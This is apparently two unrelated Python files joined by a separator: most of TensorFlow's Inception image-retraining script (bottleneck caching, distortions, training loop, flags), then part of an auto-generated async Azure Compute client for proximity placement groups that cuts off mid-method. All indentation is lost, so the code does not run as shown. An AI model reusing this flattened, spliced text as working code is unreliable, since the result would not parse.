def get_bottleneck_path(image_lists, label_name, index, bottleneck_dir,
category):
""""Returns a path to a bottleneck file for a label at the given index.
Args:
image_lists: Dictionary of training images for each label.
label_name: Label string we want to get an image for.
index: Integer offset of the image we want. This will be moduloed by the
available number of images for the label, so it can be arbitrarily large.
bottleneck_dir: Folder string holding cached files of bottleneck values.
category: Name string of set to pull images from - training, testing, or
validation.
Returns:
File system path string to an image that meets the requested parameters.
"""
return get_image_path(image_lists, label_name, index, bottleneck_dir,
category) + '.txt'
def create_inception_graph():
""""Creates a graph from saved GraphDef file and returns a Graph object.
Returns:
Graph holding the trained Inception network, and various tensors we'll be
manipulating.
"""
with tf.Graph().as_default() as graph:
model_filename = os.path.join(
FLAGS.model_dir, 'classify_image_graph_def.pb')
with gfile.FastGFile(model_filename, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
bottleneck_tensor, jpeg_data_tensor, resized_input_tensor = (
tf.import_graph_def(graph_def, name='', return_elements=[
BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME,
RESIZED_INPUT_TENSOR_NAME]))
return graph, bottleneck_tensor, jpeg_data_tensor, resized_input_tensor
def run_bottleneck_on_image(sess, image_data, image_data_tensor,
bottleneck_tensor):
"""Runs inference on an image to extract the 'bottleneck' summary layer.
Args:
sess: Current active TensorFlow Session.
image_data: String of raw JPEG data.
image_data_tensor: Input data layer in the graph.
bottleneck_tensor: Layer before the final softmax.
Returns:
Numpy array of bottleneck values.
"""
bottleneck_values = sess.run(
bottleneck_tensor,
{image_data_tensor: image_data})
bottleneck_values = np.squeeze(bottleneck_values)
return bottleneck_values
def maybe_download_and_extract():
"""Download and extract model tar file.
If the pretrained model we're using doesn't already exist, this function
downloads it from the TensorFlow.org website and unpacks it into a directory.
"""
dest_directory = FLAGS.model_dir
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' %
(filename,
float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL,
filepath,
_progress)
print()
statinfo = os.stat(filepath)
print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def ensure_dir_exists(dir_name):
"""Makes sure the folder exists on disk.
Args:
dir_name: Path string to the folder we want to create.
"""
if not os.path.exists(dir_name):
os.makedirs(dir_name)
def write_list_of_floats_to_file(list_of_floats , file_path):
"""Writes a given list of floats to a binary file.
Args:
list_of_floats: List of floats we want to write to a file.
file_path: Path to a file where list of floats will be stored.
"""
s = struct.pack('d' * BOTTLENECK_TENSOR_SIZE, *list_of_floats)
with open(file_path, 'wb') as f:
f.write(s)
def read_list_of_floats_from_file(file_path):
"""Reads list of floats from a given file.
Args:
file_path: Path to a file where list of floats was stored.
Returns:
Array of bottleneck values (list of floats).
"""
with open(file_path, 'rb') as f:
s = struct.unpack('d' * BOTTLENECK_TENSOR_SIZE, f.read())
return list(s)
bottleneck_path_2_bottleneck_values = {}
def create_bottleneck_file(bottleneck_path, image_lists, label_name, index,
image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor):
print('Creating bottleneck at ' + bottleneck_path)
image_path = get_image_path(image_lists, label_name, index, image_dir, category)
if not gfile.Exists(image_path):
tf.logging.fatal('File does not exist %s', image_path)
image_data = gfile.FastGFile(image_path, 'rb').read()
bottleneck_values = run_bottleneck_on_image(sess, image_data, jpeg_data_tensor, bottleneck_tensor)
bottleneck_string = ','.join(str(x) for x in bottleneck_values)
with open(bottleneck_path, 'w') as bottleneck_file:
bottleneck_file.write(bottleneck_string)
def get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir,
category, bottleneck_dir, jpeg_data_tensor,
bottleneck_tensor):
"""Retrieves or calculates bottleneck values for an image.
If a cached version of the bottleneck data exists on-disk, return that,
otherwise calculate the data and save it to disk for future use.
Args:
sess: The current active TensorFlow Session.
image_lists: Dictionary of training images for each label.
label_name: Label string we want to get an image for.
index: Integer offset of the image we want. This will be modulo-ed by the
available number of images for the label, so it can be arbitrarily large.
image_dir: Root folder string of the subfolders containing the training
images.
category: Name string of which set to pull images from - training, testing,
or validation.
bottleneck_dir: Folder string holding cached files of bottleneck values.
jpeg_data_tensor: The tensor to feed loaded jpeg data into.
bottleneck_tensor: The output tensor for the bottleneck values.
Returns:
Numpy array of values produced by the bottleneck layer for the image.
"""
label_lists = image_lists[label_name]
sub_dir = label_lists['dir']
sub_dir_path = os.path.join(bottleneck_dir, sub_dir)
ensure_dir_exists(sub_dir_path)
bottleneck_path = get_bottleneck_path(image_lists, label_name, index, bottleneck_dir, category)
if not os.path.exists(bottleneck_path):
create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)
with open(bottleneck_path, 'r') as bottleneck_file:
bottleneck_string = bottleneck_file.read()
did_hit_error = False
try:
bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
except:
print("Invalid float found, recreating bottleneck")
did_hit_error = True
if did_hit_error:
create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)
with open(bottleneck_path, 'r') as bottleneck_file:
bottleneck_string = bottleneck_file.read()
# Allow exceptions to propagate here, since they shouldn't happen after a fresh creation
bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
return bottleneck_values
def cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir,
jpeg_data_tensor, bottleneck_tensor):
"""Ensures all the training, testing, and validation bottlenecks are cached.
Because we're likely to read the same image multiple times (if there are no
distortions applied during training) it can speed things up a lot if we
calculate the bottleneck layer values once for each image during
preprocessing, and then just read those cached values repeatedly during
training. Here we go through all the images we've found, calculate those
values, and save them off.
Args:
sess: The current active TensorFlow Session.
image_lists: Dictionary of training images for each label.
image_dir: Root folder string of the subfolders containing the training
images.
bottleneck_dir: Folder string holding cached files of bottleneck values.
jpeg_data_tensor: Input tensor for jpeg data from file.
bottleneck_tensor: The penultimate output layer of the graph.
Returns:
Nothing.
"""
how_many_bottlenecks = 0
ensure_dir_exists(bottleneck_dir)
for label_name, label_lists in image_lists.items():
for category in ['training', 'testing', 'validation']:
category_list = label_lists[category]
for index, unused_base_name in enumerate(category_list):
get_or_create_bottleneck(sess, image_lists, label_name, index,
image_dir, category, bottleneck_dir,
jpeg_data_tensor, bottleneck_tensor)
how_many_bottlenecks += 1
if how_many_bottlenecks % 100 == 0:
print(str(how_many_bottlenecks) + ' bottleneck files created.')
def get_random_cached_bottlenecks(sess, image_lists, how_many, category,
bottleneck_dir, image_dir, jpeg_data_tensor,
bottleneck_tensor):
"""Retrieves bottleneck values for cached images.
If no distortions are being applied, this function can retrieve the cached
bottleneck values directly from disk for images. It picks a random set of
images from the specified category.
Args:
sess: Current TensorFlow Session.
image_lists: Dictionary of training images for each label.
how_many: If positive, a random sample of this size will be chosen.
If negative, all bottlenecks will be retrieved.
category: Name string of which set to pull from - training, testing, or
validation.
bottleneck_dir: Folder string holding cached files of bottleneck values.
image_dir: Root folder string of the subfolders containing the training
images.
jpeg_data_tensor: The layer to feed jpeg image data into.
bottleneck_tensor: The bottleneck output layer of the CNN graph.
Returns:
List of bottleneck arrays, their corresponding ground truths, and the
relevant filenames.
"""
class_count = len(image_lists.keys())
bottlenecks = []
ground_truths = []
filenames = []
if how_many >= 0:
# Retrieve a random sample of bottlenecks.
for unused_i in range(how_many):
label_index = random.randrange(class_count)
label_name = list(image_lists.keys())[label_index]
image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)
image_name = get_image_path(image_lists, label_name, image_index,
image_dir, category)
bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,
image_index, image_dir, category,
bottleneck_dir, jpeg_data_tensor,
bottleneck_tensor)
ground_truth = np.zeros(class_count, dtype=np.float32)
ground_truth[label_index] = 1.0
bottlenecks.append(bottleneck)
ground_truths.append(ground_truth)
filenames.append(image_name)
else:
# Retrieve all bottlenecks.
for label_index, label_name in enumerate(image_lists.keys()):
for image_index, image_name in enumerate(
image_lists[label_name][category]):
image_name = get_image_path(image_lists, label_name, image_index,
image_dir, category)
bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,
image_index, image_dir, category,
bottleneck_dir, jpeg_data_tensor,
bottleneck_tensor)
ground_truth = np.zeros(class_count, dtype=np.float32)
ground_truth[label_index] = 1.0
bottlenecks.append(bottleneck)
ground_truths.append(ground_truth)
filenames.append(image_name)
return bottlenecks, ground_truths, filenames
def get_random_distorted_bottlenecks(
sess, image_lists, how_many, category, image_dir, input_jpeg_tensor,
distorted_image, resized_input_tensor, bottleneck_tensor):
"""Retrieves bottleneck values for training images, after distortions.
If we're training with distortions like crops, scales, or flips, we have to
recalculate the full model for every image, and so we can't use cached
bottleneck values. Instead we find random images for the requested category,
run them through the distortion graph, and then the full graph to get the
bottleneck results for each.
Args:
sess: Current TensorFlow Session.
image_lists: Dictionary of training images for each label.
how_many: The integer number of bottleneck values to return.
category: Name string of which set of images to fetch - training, testing,
or validation.
image_dir: Root folder string of the subfolders containing the training
images.
input_jpeg_tensor: The input layer we feed the image data to.
distorted_image: The output node of the distortion graph.
resized_input_tensor: The input node of the recognition graph.
bottleneck_tensor: The bottleneck output layer of the CNN graph.
Returns:
List of bottleneck arrays and their corresponding ground truths.
"""
class_count = len(image_lists.keys())
bottlenecks = []
ground_truths = []
for unused_i in range(how_many):
label_index = random.randrange(class_count)
label_name = list(image_lists.keys())[label_index]
image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)
image_path = get_image_path(image_lists, label_name, image_index, image_dir,
category)
if not gfile.Exists(image_path):
tf.logging.fatal('File does not exist %s', image_path)
jpeg_data = gfile.FastGFile(image_path, 'rb').read()
# Note that we materialize the distorted_image_data as a numpy array before
# sending running inference on the image. This involves 2 memory copies and
# might be optimized in other implementations.
distorted_image_data = sess.run(distorted_image,
{input_jpeg_tensor: jpeg_data})
bottleneck = run_bottleneck_on_image(sess, distorted_image_data,
resized_input_tensor,
bottleneck_tensor)
ground_truth = np.zeros(class_count, dtype=np.float32)
ground_truth[label_index] = 1.0
bottlenecks.append(bottleneck)
ground_truths.append(ground_truth)
return bottlenecks, ground_truths
def should_distort_images(flip_left_right, random_crop, random_scale,
random_brightness):
"""Whether any distortions are enabled, from the input flags.
Args:
flip_left_right: Boolean whether to randomly mirror images horizontally.
random_crop: Integer percentage setting the total margin used around the
crop box.
random_scale: Integer percentage of how much to vary the scale by.
random_brightness: Integer range to randomly multiply the pixel values by.
Returns:
Boolean value indicating whether any distortions should be applied.
"""
return (flip_left_right or (random_crop != 0) or (random_scale != 0) or
(random_brightness != 0))
def add_input_distortions(flip_left_right, random_crop, random_scale,
random_brightness):
"""Creates the operations to apply the specified distortions.
During training it can help to improve the results if we run the images
through simple distortions like crops, scales, and flips. These reflect the
kind of variations we expect in the real world, and so can help train the
model to cope with natural data more effectively. Here we take the supplied
parameters and construct a network of operations to apply them to an image.
Cropping
~~~~~~~~
Cropping is done by placing a bounding box at a random position in the full
image. The cropping parameter controls the size of that box relative to the
input image. If it's zero, then the box is the same size as the input and no
cropping is performed. If the value is 50%, then the crop box will be half the
width and height of the input. In a diagram it looks like this:
< width >
+---------------------+
| |
| width - crop% |
| < > |
| +------+ |
| | | |
| | | |
| | | |
| +------+ |
| |
| |
+---------------------+
Scaling
~~~~~~~
Scaling is a lot like cropping, except that the bounding box is always
centered and its size varies randomly within the given range. For example if
the scale percentage is zero, then the bounding box is the same size as the
input and no scaling is applied. If it's 50%, then the bounding box will be in
a random range between half the width and height and full size.
Args:
flip_left_right: Boolean whether to randomly mirror images horizontally.
random_crop: Integer percentage setting the total margin used around the
crop box.
random_scale: Integer percentage of how much to vary the scale by.
random_brightness: Integer range to randomly multiply the pixel values by.
graph.
Returns:
The jpeg input layer and the distorted result tensor.
"""
jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')
decoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_DEPTH)
decoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)
decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)
margin_scale = 1.0 + (random_crop / 100.0)
resize_scale = 1.0 + (random_scale / 100.0)
margin_scale_value = tf.constant(margin_scale)
resize_scale_value = tf.random_uniform(tensor_shape.scalar(),
minval=1.0,
maxval=resize_scale)
scale_value = tf.multiply(margin_scale_value, resize_scale_value)
precrop_width = tf.multiply(scale_value, MODEL_INPUT_WIDTH)
precrop_height = tf.multiply(scale_value, MODEL_INPUT_HEIGHT)
precrop_shape = tf.stack([precrop_height, precrop_width])
precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)
precropped_image = tf.image.resize_bilinear(decoded_image_4d,
precrop_shape_as_int)
precropped_image_3d = tf.squeeze(precropped_image, squeeze_dims=[0])
cropped_image = tf.random_crop(precropped_image_3d,
[MODEL_INPUT_HEIGHT, MODEL_INPUT_WIDTH,
MODEL_INPUT_DEPTH])
if flip_left_right:
flipped_image = tf.image.random_flip_left_right(cropped_image)
else:
flipped_image = cropped_image
brightness_min = 1.0 - (random_brightness / 100.0)
brightness_max = 1.0 + (random_brightness / 100.0)
brightness_value = tf.random_uniform(tensor_shape.scalar(),
minval=brightness_min,
maxval=brightness_max)
brightened_image = tf.multiply(flipped_image, brightness_value)
distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')
return jpeg_data, distort_result
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def add_final_training_ops(class_count, final_tensor_name, bottleneck_tensor):
"""Adds a new softmax and fully-connected layer for training.
We need to retrain the top layer to identify our new classes, so this function
adds the right operations to the graph, along with some variables to hold the
weights, and then sets up all the gradients for the backward pass.
The set up for the softmax and fully-connected layers is based on:
https://tensorflow.org/versions/master/tutorials/mnist/beginners/index.html
Args:
class_count: Integer of how many categories of things we're trying to
recognize.
final_tensor_name: Name string for the new final node that produces results.
bottleneck_tensor: The output of the main CNN graph.
Returns:
The tensors for the training and cross entropy results, and tensors for the
bottleneck input and ground truth input.
"""
with tf.name_scope('input'):
bottleneck_input = tf.placeholder_with_default(
bottleneck_tensor, shape=[None, BOTTLENECK_TENSOR_SIZE],
name='BottleneckInputPlaceholder')
ground_truth_input = tf.placeholder(tf.float32,
[None, class_count],
name='GroundTruthInput')
# Organizing the following ops as `final_training_ops` so they're easier
# to see in TensorBoard
layer_name = 'final_training_ops'
with tf.name_scope(layer_name):
with tf.name_scope('weights'):
layer_weights = tf.Variable(tf.truncated_normal([BOTTLENECK_TENSOR_SIZE, class_count], stddev=0.001), name='final_weights')
variable_summaries(layer_weights)
with tf.name_scope('biases'):
layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')
variable_summaries(layer_biases)
with tf.name_scope('Wx_plus_b'):
logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases
tf.summary.histogram('pre_activations', logits)
final_tensor = tf.nn.softmax(logits, name=final_tensor_name)
tf.summary.histogram('activations', final_tensor)
with tf.name_scope('cross_entropy'):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
labels=ground_truth_input, logits=logits)
with tf.name_scope('total'):
cross_entropy_mean = tf.reduce_mean(cross_entropy)
tf.summary.scalar('cross_entropy', cross_entropy_mean)
with tf.name_scope('train'):
train_step = tf.train.GradientDescentOptimizer(FLAGS.learning_rate).minimize(
cross_entropy_mean)
return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input,
final_tensor)
def add_evaluation_step(result_tensor, ground_truth_tensor):
"""Inserts the operations we need to evaluate the accuracy of our results.
Args:
result_tensor: The new final node that produces results.
ground_truth_tensor: The node we feed ground truth data
into.
Returns:
Tuple of (evaluation step, prediction).
"""
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
prediction = tf.argmax(result_tensor, 1)
correct_prediction = tf.equal(
prediction, tf.argmax(ground_truth_tensor, 1))
with tf.name_scope('accuracy'):
evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', evaluation_step)
return evaluation_step, prediction
def main(_):
# Setup the directory we'll write summaries to for TensorBoard
if tf.gfile.Exists(FLAGS.summaries_dir):
tf.gfile.DeleteRecursively(FLAGS.summaries_dir)
tf.gfile.MakeDirs(FLAGS.summaries_dir)
# Set up the pre-trained graph.
maybe_download_and_extract()
graph, bottleneck_tensor, jpeg_data_tensor, resized_image_tensor = (
create_inception_graph())
# Look at the folder structure, and create lists of all the images.
image_lists = create_image_lists(FLAGS.image_dir, FLAGS.testing_percentage,
FLAGS.validation_percentage)
class_count = len(image_lists.keys())
if class_count == 0:
print('No valid folders of images found at ' + FLAGS.image_dir)
return -1
if class_count == 1:
print('Only one valid folder of images found at ' + FLAGS.image_dir +
' - multiple classes are needed for classification.')
return -1
# See if the command-line flags mean we're applying any distortions.
do_distort_images = should_distort_images(
FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,
FLAGS.random_brightness)
with tf.Session(graph=graph) as sess:
if do_distort_images:
# We will be applying distortions, so setup the operations we'll need.
distorted_jpeg_data_tensor, distorted_image_tensor = add_input_distortions(
FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,
FLAGS.random_brightness)
else:
# We'll make sure we've calculated the 'bottleneck' image summaries and
# cached them on disk.
cache_bottlenecks(sess, image_lists, FLAGS.image_dir, FLAGS.bottleneck_dir,
jpeg_data_tensor, bottleneck_tensor)
# Add the new layer that we'll be training.
(train_step, cross_entropy, bottleneck_input, ground_truth_input,
final_tensor) = add_final_training_ops(len(image_lists.keys()),
FLAGS.final_tensor_name,
bottleneck_tensor)
# Create the operations we need to evaluate the accuracy of our new layer.
evaluation_step, prediction = add_evaluation_step(
final_tensor, ground_truth_input)
# Merge all the summaries and write them out to /tmp/retrain_logs (by default)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',
sess.graph)
validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')
# Set up all our weights to their initial default values.
init = tf.global_variables_initializer()
sess.run(init)
# Run the training for as many cycles as requested on the command line.
for i in range(FLAGS.how_many_training_steps):
# Get a batch of input bottleneck values, either calculated fresh every time
# with distortions applied, or from the cache stored on disk.
if do_distort_images:
train_bottlenecks, train_ground_truth = get_random_distorted_bottlenecks(
sess, image_lists, FLAGS.train_batch_size, 'training',
FLAGS.image_dir, distorted_jpeg_data_tensor,
distorted_image_tensor, resized_image_tensor, bottleneck_tensor)
else:
train_bottlenecks, train_ground_truth, _ = get_random_cached_bottlenecks(
sess, image_lists, FLAGS.train_batch_size, 'training',
FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,
bottleneck_tensor)
# Feed the bottlenecks and ground truth into the graph, and run a training
# step. Capture training summaries for TensorBoard with the `merged` op.
train_summary, _ = sess.run([merged, train_step],
feed_dict={bottleneck_input: train_bottlenecks,
ground_truth_input: train_ground_truth})
train_writer.add_summary(train_summary, i)
# Every so often, print out how well the graph is training.
is_last_step = (i + 1 == FLAGS.how_many_training_steps)
if (i % FLAGS.eval_step_interval) == 0 or is_last_step:
train_accuracy, cross_entropy_value = sess.run(
[evaluation_step, cross_entropy],
feed_dict={bottleneck_input: train_bottlenecks,
ground_truth_input: train_ground_truth})
print('%s: Step %d: Train accuracy = %.1f%%' % (datetime.now(), i,
train_accuracy * 100))
print('%s: Step %d: Cross entropy = %f' % (datetime.now(), i,
cross_entropy_value))
validation_bottlenecks, validation_ground_truth, _ = (
get_random_cached_bottlenecks(
sess, image_lists, FLAGS.validation_batch_size, 'validation',
FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,
bottleneck_tensor))
# Run a validation step and capture training summaries for TensorBoard
# with the `merged` op.
validation_summary, validation_accuracy = sess.run(
[merged, evaluation_step],
feed_dict={bottleneck_input: validation_bottlenecks,
ground_truth_input: validation_ground_truth})
validation_writer.add_summary(validation_summary, i)
print('%s: Step %d: Validation accuracy = %.1f%% (N=%d)' %
(datetime.now(), i, validation_accuracy * 100,
len(validation_bottlenecks)))
# We've completed all our training, so run a final test evaluation on
# some new images we haven't used before.
test_bottlenecks, test_ground_truth, test_filenames = (
get_random_cached_bottlenecks(sess, image_lists, FLAGS.test_batch_size,
'testing', FLAGS.bottleneck_dir,
FLAGS.image_dir, jpeg_data_tensor,
bottleneck_tensor))
test_accuracy, predictions = sess.run(
[evaluation_step, prediction],
feed_dict={bottleneck_input: test_bottlenecks,
ground_truth_input: test_ground_truth})
print('Final test accuracy = %.1f%% (N=%d)' % (
test_accuracy * 100, len(test_bottlenecks)))
if FLAGS.print_misclassified_test_images:
print('=== MISCLASSIFIED TEST IMAGES ===')
for i, test_filename in enumerate(test_filenames):
if predictions[i] != test_ground_truth[i].argmax():
print('%70s %s' % (test_filename,
list(image_lists.keys())[predictions[i]]))
# Write out the trained graph and labels with the weights stored as constants.
output_graph_def = graph_util.convert_variables_to_constants(
sess, graph.as_graph_def(), [FLAGS.final_tensor_name])
with gfile.FastGFile(FLAGS.output_graph, 'wb') as f:
f.write(output_graph_def.SerializeToString())
with gfile.FastGFile(FLAGS.output_labels, 'w') as f:
f.write('\n'.join(image_lists.keys()) + '\n')
if __name__ == '__main__':
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
parser = argparse.ArgumentParser()
parser.add_argument(
'--image_dir',
type=str,
default='',
help='Path to folders of labeled images.'
)
parser.add_argument(
'--output_graph',
type=str,
default='/tmp/output_graph.pb',
help='Where to save the trained graph.'
)
parser.add_argument(
'--output_labels',
type=str,
default='/tmp/output_labels.txt',
help='Where to save the trained graph\'s labels.'
)
parser.add_argument(
'--summaries_dir',
type=str,
default='/tmp/retrain_logs',
help='Where to save summary logs for TensorBoard.'
)
parser.add_argument(
'--how_many_training_steps',
type=int,
default=4000,
help='How many training steps to run before ending.'
)
parser.add_argument(
'--learning_rate',
type=float,
default=0.01,
help='How large a learning rate to use when training.'
)
parser.add_argument(
'--testing_percentage',
type=int,
default=10,
help='What percentage of images to use as a test set.'
)
parser.add_argument(
'--validation_percentage',
type=int,
default=10,
help='What percentage of images to use as a validation set.'
)
parser.add_argument(
'--eval_step_interval',
type=int,
default=10,
help='How often to evaluate the training results.'
)
parser.add_argument(
'--train_batch_size',
type=int,
default=100,
help='How many images to train on at a time.'
)
parser.add_argument(
'--test_batch_size',
type=int,
default=-1,
help="""\
How many images to test on. This test set is only used once, to evaluate
the final accuracy of the model after training completes.
A value of -1 causes the entire test set to be used, which leads to more
stable results across runs.\
"""
)
parser.add_argument(
'--validation_batch_size',
type=int,
default=100,
help="""\
How many images to use in an evaluation batch. This validation set is
used much more often than the test set, and is an early indicator of how
accurate the model is during training.
A value of -1 causes the entire validation set to be used, which leads to
more stable results across training iterations, but may be slower on large
training sets.\
"""
)
parser.add_argument(
'--print_misclassified_test_images',
default=False,
help="""\
Whether to print out a list of all misclassified test images.\
""",
action='store_true'
)
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/imagenet',
help="""\
Path to classify_image_graph_def.pb,
imagenet_synset_to_human_label_map.txt, and
imagenet_2012_challenge_label_map_proto.pbtxt.\
"""
)
parser.add_argument(
'--bottleneck_dir',
type=str,
default='/tmp/bottleneck',
help='Path to cache bottleneck layer values as files.'
)
parser.add_argument(
'--final_tensor_name',
type=str,
default='final_result',
help="""\
The name of the output classification layer in the retrained graph.\
"""
)
parser.add_argument(
'--flip_left_right',
default=False,
help="""\
Whether to randomly flip half of the training images horizontally.\
""",
action='store_true'
)
parser.add_argument(
'--random_crop',
type=int,
default=0,
help="""\
A percentage determining how much of a margin to randomly crop off the
training images.\
"""
)
parser.add_argument(
'--random_scale',
type=int,
default=0,
help="""\
A percentage determining how much to randomly scale up the size of the
training images by.\
"""
)
parser.add_argument(
'--random_brightness',
type=int,
default=0,
help="""\
A percentage determining how much to randomly multiply the training image
input pixels up or down by.\
"""
)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._proximity_placement_groups_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProximityPlacementGroupsOperations:
"""ProximityPlacementGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
proximity_placement_group_name: str,
parameters: "_models.ProximityPlacementGroup",
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Create or update a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param parameters: Parameters supplied to the Create Proximity Placement Group operation.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ProximityPlacementGroup')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def update(
self,
resource_group_name: str,
proximity_placement_group_name: str,
parameters: "_models.ProximityPlacementGroupUpdate",
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Update a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param parameters: Parameters supplied to the Update Proximity Placement Group operation.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ProximityPlacementGroupUpdate')
request = build_update_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
